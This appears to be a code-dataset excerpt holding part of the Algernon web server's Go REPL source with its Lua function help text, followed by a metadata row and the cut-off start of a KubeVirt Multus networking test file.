CallPlugin(string, string, ...) -> string
Code libraries
// Create or use a code library object. Takes an optional data structure name.
CodeLib([string]) -> userdata
// Given a namespace and Lua code, add the given code to the namespace.
// Returns true if successful.
codelib:add(string, string) -> bool
// Given a namespace and Lua code, set the given code as the only code
// in the namespace. Returns true if successful.
codelib:set(string, string) -> bool
// Given a namespace, return Lua code, or an empty string.
codelib:get(string) -> string
// Import (eval) code from the given namespace into the current Lua state.
// Returns true if successful.
codelib:import(string) -> bool
// Completely clear the code library. Returns true if successful.
codelib:clear() -> bool
Various
// Return a string with various server information
ServerInfo() -> string
// Return the version string for the server
version() -> string
// Tries to extract and print the contents of the given Lua values
pprint(...)
// Sleep the given number of seconds (can be a float)
sleep(number)
// Return the number of nanoseconds from 1970 ("Unix time")
unixnano() -> number
// Convert Markdown to HTML
markdown(string) -> string
// Query a PostgreSQL database with a query and a connection string.
// Default connection string: "host=localhost port=5432 user=postgres dbname=test sslmode=disable"
PQ([string], [string]) -> table
// Query a MSSQL database with a query and a connection string.
// Default connection string: "server=localhost;user=user;password=password,port=1433"
MSSQL([string], [string]) -> table
REPL-only
// Output the current working directory
cwd | pwd
// Output the current file or directory that is being served
serverdir | serverfile
// Exit Algernon
exit | halt | quit | shutdown
Extra
// Takes a Python filename, executes the script with the "python" binary in the Path.
// Returns the output as a Lua table, where each line is an entry.
py(string) -> table
// Takes one or more system commands (possibly separated by ";") and runs them.
// Returns the output lines as a table.
run(string) -> table
// Lists the keys and values of a Lua table. Returns a string.
// Lists the contents of the global namespace "_G" if no arguments are given.
dir([table]) -> string
`
usageMessage = `
Type "webhelp" for an overview of functions that are available when
handling requests. Or "confighelp" for an overview of functions that are
available when configuring an Algernon application.
`
webHelpText = `Available functions:
Handling users and permissions
// Check if the current user has "user" rights
UserRights() -> bool
// Check if the given username exists (does not check unconfirmed users)
HasUser(string) -> bool
// Check if the given username exists in the list of unconfirmed users
HasUnconfirmedUser(string) -> bool
// Get the value from the given boolean field
// Takes a username and field name
BooleanField(string, string) -> bool
// Save a value as a boolean field
// Takes a username, field name and boolean value
SetBooleanField(string, string, bool)
// Check if a given username is confirmed
IsConfirmed(string) -> bool
// Check if a given username is logged in
IsLoggedIn(string) -> bool
// Check if the current user has "admin rights"
AdminRights() -> bool
// Check if a given username is an admin
IsAdmin(string) -> bool
// Get the username stored in a cookie, or an empty string
UsernameCookie() -> string
// Store the username in a cookie, returns true if successful
SetUsernameCookie(string) -> bool
// Clear the login cookie
ClearCookie()
// Get a table containing all usernames
AllUsernames() -> table
// Get the email for a given username, or an empty string
Email(string) -> string
// Get the password hash for a given username, or an empty string
PasswordHash(string) -> string
// Get all unconfirmed usernames
AllUnconfirmedUsernames() -> table
// Get the existing confirmation code for a given user,
// or an empty string. Takes a username.
ConfirmationCode(string) -> string
// Add a user to the list of unconfirmed users.
// Takes a username and a confirmation code.
// Remember to also add a user, when registering new users.
AddUnconfirmed(string, string)
// Remove a user from the list of unconfirmed users. Takes a username.
RemoveUnconfirmed(string)
// Mark a user as confirmed. Takes a username.
MarkConfirmed(string)
// Removes a user. Takes a username.
RemoveUser(string)
// Make a user an admin. Takes a username.
SetAdminStatus(string)
// Make an admin user a regular user. Takes a username.
RemoveAdminStatus(string)
// Add a user. Takes a username, password and email.
AddUser(string, string, string)
// Set a user as logged in on the server (not cookie). Takes a username.
SetLoggedIn(string)
// Set a user as logged out on the server (not cookie). Takes a username.
SetLoggedOut(string)
// Log in a user, both on the server and with a cookie. Takes a username.
Login(string)
// Log out a user, on the server (which is enough). Takes a username.
Logout(string)
// Get the current username, from the cookie
Username() -> string
// Get the current cookie timeout. Takes a username.
CookieTimeout(string) -> number
// Set the current cookie timeout. Takes a timeout, in seconds.
SetCookieTimeout(number)
// Get the current server-wide cookie secret, for persistent logins
CookieSecret() -> string
// Set the current server-side cookie secret, for persistent logins
SetCookieSecret(string)
// Get the current password hashing algorithm (bcrypt, bcrypt+ or sha256)
PasswordAlgo() -> string
// Set the current password hashing algorithm (bcrypt, bcrypt+ or sha256)
// Takes a string
SetPasswordAlgo(string)
// Hash the password
// Takes a username and password (username can be used for salting)
HashPassword(string, string) -> string
// Change the password for a user, given a username and a new password
SetPassword(string, string)
// Check if a given username and password is correct
// Takes a username and password
CorrectPassword(string, string) -> bool
// Checks if a confirmation code is already in use
// Takes a confirmation code
AlreadyHasConfirmationCode(string) -> bool
// Find a username based on a given confirmation code,
// or returns an empty string. Takes a confirmation code
FindUserByConfirmationCode(string) -> string
// Mark a user as confirmed
// Takes a username
Confirm(string)
// Mark a user as confirmed, returns true if successful
// Takes a confirmation code
ConfirmUserByConfirmationCode(string) -> bool
// Set the minimum confirmation code length
// Takes the minimum number of characters
SetMinimumConfirmationCodeLength(number)
// Generates a unique confirmation code, or an empty string
GenerateUniqueConfirmationCode() -> string
File uploads
// Creates a file upload object. Takes a form ID (from a POST request) as the
// first parameter. Takes an optional maximum upload size (in MiB) as the
// second parameter. Returns nil and an error string on failure, or userdata
// and an empty string on success.
UploadedFile(string[, number]) -> userdata, string
// Return the uploaded filename, as specified by the client
uploadedfile:filename() -> string
// Return the size of the data that has been received
uploadedfile:size() -> number
// Return the mime type of the uploaded file, as specified by the client
uploadedfile:mimetype() -> string
// Return the full textual content of the uploaded file
uploadedfile:content() -> string
// Save the uploaded data locally. Takes an optional filename.
uploadedfile:save([string]) -> bool
// Save the uploaded data as the client-provided filename, in the specified
// directory. Takes a relative or absolute path. Returns true on success.
uploadedfile:savein(string) -> bool
Handling requests
// Set the Content-Type for a page.
content(string)
// Return the requested HTTP method (GET, POST etc).
method() -> string
// Output text to the browser/client. Takes a variable number of strings.
print(...)
// Return the requested URL path.
urlpath() -> string
// Return the HTTP header in the request, for a given key, or an empty string.
header(string) -> string
// Set an HTTP header given a key and a value.
setheader(string, string)
// Return the HTTP headers, as a table.
headers() -> table
// Return the HTTP body in the request
// (will only read the body once, since it's streamed).
body() -> string
// Set a HTTP status code (like 200 or 404).
// Must be used before other functions that writes to the client!
status(number)
// Set a HTTP status code and output a message (optional).
error(number[, string])
// Return the directory where the script is running. If a filename (optional)
// is given, then the path to where the script is running, joined with a path
// separator and the given filename, is returned.
scriptdir([string]) -> string
// Return the directory where the server is running. If a filename (optional)
// is given, then the path to where the server is running, joined with a path
// separator and the given filename, is returned.
serverdir([string]) -> string
// Serve a file that exists in the same directory as the script.
serve(string)
// Serve a Pongo2 template file, with an optional table with key/values.
serve2(string[, table])
// Return the rendered contents of a file that exists in the same directory
// as the script. Takes a filename.
render(string) -> string
// Return a table with keys and values as given in a posted form, or as given
// in the URL ("/some/page?x=7" makes "x" with the value "7" available).
formdata() -> table
// Redirect to an absolute or relative URL. Also takes a HTTP status code.
redirect(string[, number])
// Permanently redirect to an absolute or relative URL. Uses status code 302.
permanent_redirect(string)
// Transmit what has been outputted so far, to the client.
flush()
`
configHelpText = `Available functions:
Only available when used in serverconf.lua
// Set the default address for the server on the form [host][:port].
SetAddr(string)
// Reset the URL prefixes and make everything *public*.
ClearPermissions()
// Add an URL prefix that will have *admin* rights.
AddAdminPrefix(string)
// Add an URL prefix that will have *user* rights.
AddUserPrefix(string)
// Provide a lua function that will be used as the permission denied handler.
DenyHandler(function)
// Provide a lua function that will be run once,
// when the server is ready to start serving.
OnReady(function)
// Use a Lua file for setting up HTTP handlers instead of using the directory structure.
ServerFile(string) -> bool
// Get the cookie secret from the server configuration.
CookieSecret() -> string
// Set the cookie secret that will be used when setting and getting browser cookies.
SetCookieSecret(string)
`
exitMessage = "bye"
)
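// A minimal, hypothetical Lua snippet using the data-structure API documented
// in the help text above (assumes a database backend is configured):
//
//	users = Set("users")
//	users:add("bob")
//	pprint(users:getall())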
// Export Lua functions specific to the REPL
func exportREPLSpecific(L *lua.LState) {
// Attempt to return a more informative text than the memory location.
// Can take several arguments, just like print().
L.SetGlobal("pprint", L.NewFunction(func(L *lua.LState) int {
var buf bytes.Buffer
top := L.GetTop()
for i := 1; i <= top; i++ {
convert.PprintToWriter(&buf, L.Get(i))
if i != top {
buf.WriteString("\t")
}
}
// Output the combined text
fmt.Println(buf.String())
return 0 // number of results
}))
// Get the current directory since this is probably in the REPL
L.SetGlobal("scriptdir", L.NewFunction(func(L *lua.LState) int {
scriptpath, err := os.Getwd()
if err != nil {
log.Error(err)
L.Push(lua.LString("."))
return 1 // number of results
}
top := L.GetTop()
if top == 1 {
// Also include a separator and a filename
fn := L.ToString(1)
scriptpath = filepath.Join(scriptpath, fn)
}
// Now have the correct absolute scriptpath
L.Push(lua.LString(scriptpath))
return 1 // number of results
}))
}
// Split the given line in three parts, and color the parts
func colorSplit(line, sep string, colorFunc1, colorFuncSep, colorFunc2 func(string) string, reverse bool) (string, string) {
if strings.Contains(line, sep) {
fields := strings.SplitN(line, sep, 2)
s1 := ""
if colorFunc1 != nil {
s1 += colorFunc1(fields[0])
} else {
s1 += fields[0]
}
s2 := ""
if colorFunc2 != nil {
s2 += colorFuncSep(sep) + colorFunc2(fields[1])
} else {
s2 += sep + fields[1]
}
return s1, s2
}
if reverse {
return "", line
}
return line, ""
}
// Syntax highlight the given line
func highlight(o *textoutput.TextOutput, line string) string {
unprocessed := line
unprocessed, comment := colorSplit(unprocessed, "//", nil, o.DarkGray, o.DarkGray, false)
module, unprocessed := colorSplit(unprocessed, ":", o.LightGreen, o.DarkRed, nil, true)
function := ""
if unprocessed != "" {
// Green function names
if strings.Contains(unprocessed, "(") {
fields := strings.SplitN(unprocessed, "(", 2)
function = o.LightGreen(fields[0])
unprocessed = "(" + fields[1]
} else if strings.Contains(unprocessed, "|") {
unprocessed = "<magenta>" + strings.ReplaceAll(unprocessed, "|", "<white>|</white><magenta>") + "</magenta>"
}
}
unprocessed, typed := colorSplit(unprocessed, "->", nil, o.LightBlue, o.DarkRed, false)
unprocessed = strings.ReplaceAll(unprocessed, "string", o.LightBlue("string"))
unprocessed = strings.ReplaceAll(unprocessed, "number", o.LightYellow("number"))
unprocessed = strings.ReplaceAll(unprocessed, "function", o.LightCyan("function"))
return module + function + unprocessed + typed + comment
}
// Output syntax highlighted help text, with an additional usage message
func outputHelp(o *textoutput.TextOutput, helpText string) {
for _, line := range strings.Split(helpText, "\n") {
o.Println(highlight(o, line))
}
o.Println(usageMessage)
}
// Output syntax highlighted help about a specific topic or function
func outputHelpAbout(o *textoutput.TextOutput, helpText, topic string) {
switch topic {
case "help":
o.Println(o.DarkGray("Output general help or help about a specific topic."))
return
case "webhelp":
o.Println(o.DarkGray("Output help about web-related functions."))
return
case "confighelp":
o.Println(o.DarkGray("Output help about configuration-related functions."))
return
case "quit", "exit", "shutdown", "halt":
o.Println(o.DarkGray("Quit Algernon."))
return
}
comment := ""
for _, line := range strings.Split(helpText, "\n") {
if strings.HasPrefix(line, topic) {
// Output help text, with some surrounding blank lines
o.Println("\n" + highlight(o, line))
o.Println("\n" + o.DarkGray(strings.TrimSpace(comment)) + "\n")
return
}
// Gather comments until a non-comment is encountered
if strings.HasPrefix(line, "//") {
comment += strings.TrimSpace(line[2:]) + "\n"
} else {
comment = ""
}
}
o.Println(o.DarkGray("Found no help for: ") + o.White(topic))
}
// Take all functions mentioned in the given help text string and add them to the readline completer
func addFunctionsFromHelptextToCompleter(helpText string, completer *readline.PrefixCompleter) {
for _, line := range strings.Split(helpText, "\n") {
if !strings.HasPrefix(line, "//") && strings.Contains(line, "(") {
parts := strings.Split(line, "(")
if strings.Contains(line, "()") {
completer.Children = append(completer.Children, &readline.PrefixCompleter{Name: []rune(parts[0] + "()")})
} else {
completer.Children = append(completer.Children, &readline.PrefixCompleter{Name: []rune(parts[0] + "(")})
}
}
}
}
// LoadLuaFunctionsForREPL exports the various Lua functions that might be needed in the REPL
func (ac *Config) LoadLuaFunctionsForREPL(L *lua.LState, o *textoutput.TextOutput) {
// Server configuration functions
ac.LoadServerConfigFunctions(L, "")
// Other basic system functions, like log()
ac.LoadBasicSystemFunctions(L)
// If there is a database backend
if ac.perm != nil {
// Retrieve the creator struct
creator := ac.perm.UserState().Creator()
// Simpleredis data structures
datastruct.LoadList(L, creator)
datastruct.LoadSet(L, creator)
datastruct.LoadHash(L, creator)
datastruct.LoadKeyValue(L, creator)
// For saving and loading Lua functions
codelib.Load(L, creator)
}
// For handling JSON data
jnode.LoadJSONFunctions(L)
ac.LoadJFile(L, ac.serverDirOrFilename)
jnode.Load(L)
// Extras
pure.Load(L)
// Export pprint and scriptdir
exportREPLSpecific(L)
// Plugin functionality
ac.LoadPluginFunctions(L, o)
// Cache
ac.LoadCacheFunctions(L)
}
// REPL provides a "Read Eval Print" loop for interacting with Lua.
// A variety of functions are exposed to the Lua state.
func (ac *Config) REPL(ready, done chan bool) error {
var (
historyFilename string
err error
)
historydir, err := homedir.Dir()
if err != nil {
log.Error("Could not find a user directory to store the REPL history.")
historydir = "."
}
// Retrieve a Lua state
L := ac.luapool.Get()
// Don't re-use the Lua state
defer L.Close()
// Colors and input
windows := (runtime.GOOS == "windows")
mingw := windows && strings.HasPrefix(os.Getenv("TERM"), "xterm")
enableColors := !windows || mingw
o := textoutput.NewTextOutput(enableColors, true)
// Command history file
if windows {
historyFilename = filepath.Join(historydir, "algernon_history.txt")
} else {
historyFilename = filepath.Join(historydir, ".algernon_history")
}
// Export a selection of functions to the Lua state
ac.LoadLuaFunctionsForREPL(L, o)
<-ready // Wait for the server to be ready
// Tell the user that the server is ready
o.Println(o.LightGreen("Ready"))
// Start the read, eval, print loop
var (
line string
prompt = o.LightCyan("lua> ")
EOF bool
EOFcount int
)
// TODO: Automatically generate a list of all words that should be completed
// based on the documentation or repl help text. Then add each word
// to the completer.
completer := readline.NewPrefixCompleter(
&readline.PrefixCompleter{Name: []rune("bye")},
&readline.PrefixCompleter{Name: []rune("confighelp")},
&readline.PrefixCompleter{Name: []rune("cwd")},
&readline.PrefixCompleter{Name: []rune("dir")},
&readline.PrefixCompleter{Name: []rune("exit")},
&readline.PrefixCompleter{Name: []rune("help")},
&readline.PrefixCompleter{Name: []rune("pwd")},
&readline.PrefixCompleter{Name: []rune("quit")},
&readline.PrefixCompleter{Name: []rune("serverdir")},
&readline.PrefixCompleter{Name: []rune("serverfile")},
&readline.PrefixCompleter{Name: []rune("webhelp")},
&readline.PrefixCompleter{Name: []rune("zalgo")},
)
addFunctionsFromHelptextToCompleter(generalHelpText, completer)
l, err := readline.NewEx(&readline.Config{
Prompt: prompt,
HistoryFile: historyFilename,
AutoComplete: completer,
InterruptPrompt: "^C",
EOFPrompt: "exit",
HistorySearchFold: true,
})
if err != nil {
log.Error("Could not initiate github.com/chzyer/readline: " + err.Error())
}
// To be run at server shutdown
AtShutdown(func() {
// Verbose mode has different log output at shutdown
if !ac.verboseMode {
o.Println(o.LightBlue(exitMessage))
}
})
for {
// Retrieve user input
EOF = false
if mingw {
// No support for EOF
line = ask.Ask(prompt)
} else {
if line, err = l.Readline(); err != nil {
switch {
case err == io.EOF:
if ac.debugMode {
o.Println(o.LightPurple(err.Error()))
}
EOF = true
case err == readline.ErrInterrupt:
log.Warn("Interrupted")
done <- true
return nil
default:
log.Error("Error reading line(" + err.Error() + ").")
continue
}
}
}
if EOF {
if ac.ctrldTwice {
switch EOFcount {
case 0:
o.Err("Press ctrl-d again to exit.")
EOFcount++
continue
default:
done <- true
return nil
}
} else {
done <- true
return nil
}
}
line = strings.TrimSpace(line)
if line == "" {
continue
}
switch line {
case "help":
outputHelp(o, generalHelpText)
continue
case "webhelp":
outputHelp(o, webHelpText)
continue
case "confighelp":
outputHelp(o, configHelpText)
continue
case "dir":
// Be more helpful than listing the Lua bytecode contents of the dir function. Call "dir()".
line = "dir()"
case "cwd", "pwd":
if cwd, err := os.Getwd(); err != nil {
			// Fall back to the environment if os.Getwd fails. Should work on Windows, Linux and macOS
line = "os.getenv'CD' or os.getenv'PWD'"
} else {
fmt.Println(cwd)
continue
}
case "serverfile", "serverdir":
if absdir, err := filepath.Abs(ac.serverDirOrFilename); err != nil {
fmt.Println(ac.serverDirOrFilename)
} else {
fmt.Println(absdir)
}
continue
case "quit", "exit", "shutdown", "halt":
done <- true
return nil
case "zalgo":
// Easter egg
o.ErrExit("Ḫ̷̲̫̰̯̭̀̂̑~ͅĚ̥̖̩̘̱͔͈͈ͬ̚ ̦̦͖̲̀ͦ͂C̜͓̲̹͐̔ͭ̏Oͭ͛͂̋ͭͬͬ͆͏̺͓̰͚͠ͅM̢͉̼̖͍̊̕Ḛ̭̭͗̉̀̆ͬ̐ͪ̒S͉̪͂͌̄")
default:
topic := ""
if len(line) > 5 && (strings.HasPrefix(line, "help(") || strings.HasPrefix(line, "help ")) {
topic = line[5:]
} else if len(line) > 8 && (strings.HasPrefix(line, "webhelp(") || strings.HasPrefix(line, "webhelp ")) {
topic = line[8:]
}
if len(topic) > 0 {
topic = strings.TrimSuffix(topic, ")")
outputHelpAbout(o, generalHelpText+webHelpText+configHelpText, topic)
continue
}
}
// If the line starts with print, don't touch it
if strings.HasPrefix(line, "print(") {
if err = L.DoString(line); err != nil {
// Output the error message
o.Err(err.Error())
}
} else {
// Wrap the line in "pprint"
if err = L.DoString("pprint(" + line + ")"); err != nil {
// If there was a syntax error, try again without pprint
if strings.Contains(err.Error(), "syntax error") {
if err = L.DoString(line); err != nil {
// Output the error message
o.Err(err.Error())
}
// For other kinds of errors, output the error
} else {
// Output the error message
o.Err(err.Error())
}
}
}
}
}
| [
"\"TERM\""
]
| []
| [
"TERM"
]
| [] | ["TERM"] | go | 1 | 0 | |
tests/network/vmi_multus.go | /*
* This file is part of the kubevirt project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* Copyright 2018 Red Hat, Inc.
*
*/
package network
import (
"context"
"fmt"
"net"
"os"
"strings"
"time"
expect "github.com/google/goexpect"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
appsv1 "k8s.io/api/apps/v1"
k8sv1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
"k8s.io/apimachinery/pkg/api/resource"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
v13 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/utils/pointer"
virtconfig "kubevirt.io/kubevirt/pkg/virt-config"
"kubevirt.io/kubevirt/pkg/virt-controller/services"
"kubevirt.io/kubevirt/pkg/virt-launcher/virtwrap/api"
v1 "kubevirt.io/client-go/api/v1"
"kubevirt.io/client-go/kubecli"
"kubevirt.io/kubevirt/tests"
"kubevirt.io/kubevirt/tests/console"
cd "kubevirt.io/kubevirt/tests/containerdisk"
"kubevirt.io/kubevirt/tests/flags"
"kubevirt.io/kubevirt/tests/libnet"
"kubevirt.io/kubevirt/tests/libvmi"
)
const (
postUrl = "/apis/k8s.cni.cncf.io/v1/namespaces/%s/network-attachment-definitions/%s"
linuxBridgeConfCRD = `{"apiVersion":"k8s.cni.cncf.io/v1","kind":"NetworkAttachmentDefinition","metadata":{"name":"%s","namespace":"%s"},"spec":{"config":"{ \"cniVersion\": \"0.3.1\", \"name\": \"mynet\", \"plugins\": [{\"type\": \"bridge\", \"bridge\": \"br10\", \"vlan\": 100, \"ipam\": {}},{\"type\": \"tuning\"}]}"}}`
ptpConfCRD = `{"apiVersion":"k8s.cni.cncf.io/v1","kind":"NetworkAttachmentDefinition","metadata":{"name":"%s","namespace":"%s"},"spec":{"config":"{ \"cniVersion\": \"0.3.1\", \"name\": \"mynet\", \"plugins\": [{\"type\": \"ptp\", \"ipam\": { \"type\": \"host-local\", \"subnet\": \"%s\" }},{\"type\": \"tuning\"}]}"}}`
sriovConfCRD = `{"apiVersion":"k8s.cni.cncf.io/v1","kind":"NetworkAttachmentDefinition","metadata":{"name":"%s","namespace":"%s","annotations":{"k8s.v1.cni.cncf.io/resourceName":"%s"}},"spec":{"config":"{ \"cniVersion\": \"0.3.1\", \"name\": \"sriov\", \"type\": \"sriov\", \"vlan\": 0, \"ipam\": { \"type\": \"host-local\", \"subnet\": \"10.1.1.0/24\" } }"}}`
sriovLinkEnableConfCRD = `{"apiVersion":"k8s.cni.cncf.io/v1","kind":"NetworkAttachmentDefinition","metadata":{"name":"%s","namespace":"%s","annotations":{"k8s.v1.cni.cncf.io/resourceName":"%s"}},"spec":{"config":"{ \"cniVersion\": \"0.3.1\", \"name\": \"sriov\", \"type\": \"sriov\", \"link_state\": \"enable\", \"vlan\": 0, \"ipam\": { \"type\": \"host-local\", \"subnet\": \"10.1.1.0/24\" } }"}}`
macvtapNetworkConf = `{"apiVersion":"k8s.cni.cncf.io/v1","kind":"NetworkAttachmentDefinition","metadata":{"name":"%s","namespace":"%s", "annotations": {"k8s.v1.cni.cncf.io/resourceName": "macvtap.network.kubevirt.io/%s"}},"spec":{"config":"{ \"cniVersion\": \"0.3.1\", \"name\": \"%s\", \"type\": \"macvtap\"}"}}`
sriovConfVlanCRD = `{"apiVersion":"k8s.cni.cncf.io/v1","kind":"NetworkAttachmentDefinition","metadata":{"name":"%s","namespace":"%s","annotations":{"k8s.v1.cni.cncf.io/resourceName":"%s"}},"spec":{"config":"{ \"cniVersion\": \"0.3.1\", \"name\": \"sriov\", \"type\": \"sriov\", \"link_state\": \"enable\", \"vlan\": 200, \"ipam\":{}}"}}`
)
const (
sriovnet1 = "sriov"
sriovnet2 = "sriov2"
sriovnet3 = "sriov3"
)
const ptpSubnet = "10.1.1.0/24"
var _ = SIGDescribe("[Serial]Multus", func() {
var err error
var virtClient kubecli.KubevirtClient
var nodes *k8sv1.NodeList
defaultInterface := v1.Interface{
Name: "default",
InterfaceBindingMethod: v1.InterfaceBindingMethod{
Masquerade: &v1.InterfaceMasquerade{},
},
}
linuxBridgeInterface := v1.Interface{
Name: "linux-bridge",
InterfaceBindingMethod: v1.InterfaceBindingMethod{
Bridge: &v1.InterfaceBridge{},
},
}
defaultNetwork := v1.Network{
Name: "default",
NetworkSource: v1.NetworkSource{
Pod: &v1.PodNetwork{},
},
}
linuxBridgeNetwork := v1.Network{
Name: "linux-bridge",
NetworkSource: v1.NetworkSource{
Multus: &v1.MultusNetwork{
NetworkName: "linux-bridge-net-vlan100",
},
},
}
tests.BeforeAll(func() {
virtClient, err = kubecli.GetKubevirtClient()
tests.PanicOnError(err)
tests.BeforeTestCleanup()
nodes = tests.GetAllSchedulableNodes(virtClient)
Expect(len(nodes.Items) > 0).To(BeTrue())
configureNodeNetwork(virtClient)
result := virtClient.RestClient().
Post().
RequestURI(fmt.Sprintf(postUrl, tests.NamespaceTestDefault, "linux-bridge-net-vlan100")).
Body([]byte(fmt.Sprintf(linuxBridgeConfCRD, "linux-bridge-net-vlan100", tests.NamespaceTestDefault))).
Do(context.Background())
Expect(result.Error()).NotTo(HaveOccurred())
// Create ptp crds with tuning plugin enabled in two different namespaces
result = virtClient.RestClient().
Post().
RequestURI(fmt.Sprintf(postUrl, tests.NamespaceTestDefault, "ptp-conf-1")).
Body([]byte(fmt.Sprintf(ptpConfCRD, "ptp-conf-1", tests.NamespaceTestDefault, ptpSubnet))).
Do(context.Background())
Expect(result.Error()).NotTo(HaveOccurred())
result = virtClient.RestClient().
Post().
RequestURI(fmt.Sprintf(postUrl, tests.NamespaceTestAlternative, "ptp-conf-2")).
Body([]byte(fmt.Sprintf(ptpConfCRD, "ptp-conf-2", tests.NamespaceTestAlternative, ptpSubnet))).
Do(context.Background())
Expect(result.Error()).NotTo(HaveOccurred())
})
BeforeEach(func() {
// Multus tests need to ensure that old VMIs are gone
Expect(virtClient.RestClient().Delete().Namespace(tests.NamespaceTestDefault).Resource("virtualmachineinstances").Do(context.Background()).Error()).To(Succeed())
Expect(virtClient.RestClient().Delete().Namespace(tests.NamespaceTestAlternative).Resource("virtualmachineinstances").Do(context.Background()).Error()).To(Succeed())
Eventually(func() int {
list1, err := virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).List(&v13.ListOptions{})
Expect(err).ToNot(HaveOccurred())
list2, err := virtClient.VirtualMachineInstance(tests.NamespaceTestAlternative).List(&v13.ListOptions{})
Expect(err).ToNot(HaveOccurred())
return len(list1.Items) + len(list2.Items)
}, 6*time.Minute, 1*time.Second).Should(BeZero())
})
createVMIOnNode := func(interfaces []v1.Interface, networks []v1.Network) *v1.VirtualMachineInstance {
vmi := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskAlpine), "#!/bin/bash\n")
vmi.Spec.Domain.Devices.Interfaces = interfaces
vmi.Spec.Networks = networks
// Arbitrarily select one compute node in the cluster, on which it is possible to create a VMI
// (i.e. a schedulable node).
nodeName := nodes.Items[0].Name
tests.StartVmOnNode(vmi, nodeName)
return vmi
}
Describe("[rfe_id:694][crit:medium][vendor:[email protected]][level:component]VirtualMachineInstance using different types of interfaces.", func() {
const ptpGateway = "10.1.1.1"
Context("VirtualMachineInstance with cni ptp plugin interface", func() {
It("[test_id:1751]should create a virtual machine with one interface", func() {
By("checking virtual machine instance can ping using ptp cni plugin")
detachedVMI := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskCirros), "#!/bin/bash\necho 'hello'\n")
detachedVMI.Spec.Domain.Devices.Interfaces = []v1.Interface{{Name: "ptp", InterfaceBindingMethod: v1.InterfaceBindingMethod{Bridge: &v1.InterfaceBridge{}}}}
detachedVMI.Spec.Networks = []v1.Network{
{Name: "ptp", NetworkSource: v1.NetworkSource{
Multus: &v1.MultusNetwork{NetworkName: "ptp-conf-1"},
}},
}
_, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(detachedVMI)
Expect(err).ToNot(HaveOccurred())
tests.WaitUntilVMIReady(detachedVMI, libnet.WithIPv6(console.LoginToCirros))
Expect(libnet.PingFromVMConsole(detachedVMI, ptpGateway)).To(Succeed())
})
It("[test_id:1752]should create a virtual machine with one interface with network definition from different namespace", func() {
				tests.SkipIfOpenShift4("OpenShift 4 does not support usage of a network definition from a different namespace")
By("checking virtual machine instance can ping using ptp cni plugin")
detachedVMI := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskCirros), "#!/bin/bash\necho 'hello'\n")
detachedVMI.Spec.Domain.Devices.Interfaces = []v1.Interface{{Name: "ptp", InterfaceBindingMethod: v1.InterfaceBindingMethod{Bridge: &v1.InterfaceBridge{}}}}
detachedVMI.Spec.Networks = []v1.Network{
{Name: "ptp", NetworkSource: v1.NetworkSource{
Multus: &v1.MultusNetwork{NetworkName: fmt.Sprintf("%s/%s", tests.NamespaceTestAlternative, "ptp-conf-2")},
}},
}
_, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(detachedVMI)
Expect(err).ToNot(HaveOccurred())
tests.WaitUntilVMIReady(detachedVMI, libnet.WithIPv6(console.LoginToCirros))
Expect(libnet.PingFromVMConsole(detachedVMI, ptpGateway)).To(Succeed())
})
It("[test_id:1753]should create a virtual machine with two interfaces", func() {
By("checking virtual machine instance can ping using ptp cni plugin")
detachedVMI := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskCirros), "#!/bin/bash\necho 'hello'\n")
detachedVMI.Spec.Domain.Devices.Interfaces = []v1.Interface{
defaultInterface,
{Name: "ptp", InterfaceBindingMethod: v1.InterfaceBindingMethod{Bridge: &v1.InterfaceBridge{}}}}
detachedVMI.Spec.Networks = []v1.Network{
defaultNetwork,
{Name: "ptp", NetworkSource: v1.NetworkSource{
Multus: &v1.MultusNetwork{NetworkName: "ptp-conf-1"},
}},
}
_, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(detachedVMI)
Expect(err).ToNot(HaveOccurred())
tests.WaitUntilVMIReady(detachedVMI, libnet.WithIPv6(console.LoginToCirros))
cmdCheck := "sudo /sbin/cirros-dhcpc up eth1 > /dev/null\n"
err = console.SafeExpectBatch(detachedVMI, []expect.Batcher{
&expect.BSnd{S: "\n"},
&expect.BExp{R: console.PromptExpression},
&expect.BSnd{S: cmdCheck},
&expect.BExp{R: console.PromptExpression},
&expect.BSnd{S: "ip addr show eth1 | grep 10.1.1 | wc -l\n"},
&expect.BExp{R: console.RetValue("1")},
}, 15)
Expect(err).ToNot(HaveOccurred())
By("checking virtual machine instance has two interfaces")
Expect(checkInterface(detachedVMI, "eth0")).To(Succeed())
Expect(checkInterface(detachedVMI, "eth1")).To(Succeed())
Expect(libnet.PingFromVMConsole(detachedVMI, ptpGateway)).To(Succeed())
})
})
Context("VirtualMachineInstance with multus network as default network", func() {
It("[test_id:1751]should create a virtual machine with one interface with multus default network definition", func() {
detachedVMI := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskCirros), "#!/bin/bash\necho 'hello'\n")
detachedVMI.Spec.Domain.Devices.Interfaces = []v1.Interface{{Name: "ptp", InterfaceBindingMethod: v1.InterfaceBindingMethod{Bridge: &v1.InterfaceBridge{}}}}
detachedVMI.Spec.Networks = []v1.Network{
{Name: "ptp", NetworkSource: v1.NetworkSource{
Multus: &v1.MultusNetwork{
NetworkName: fmt.Sprintf("%s/%s", tests.NamespaceTestDefault, "ptp-conf-1"),
Default: true,
}}},
}
_, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(detachedVMI)
Expect(err).ToNot(HaveOccurred())
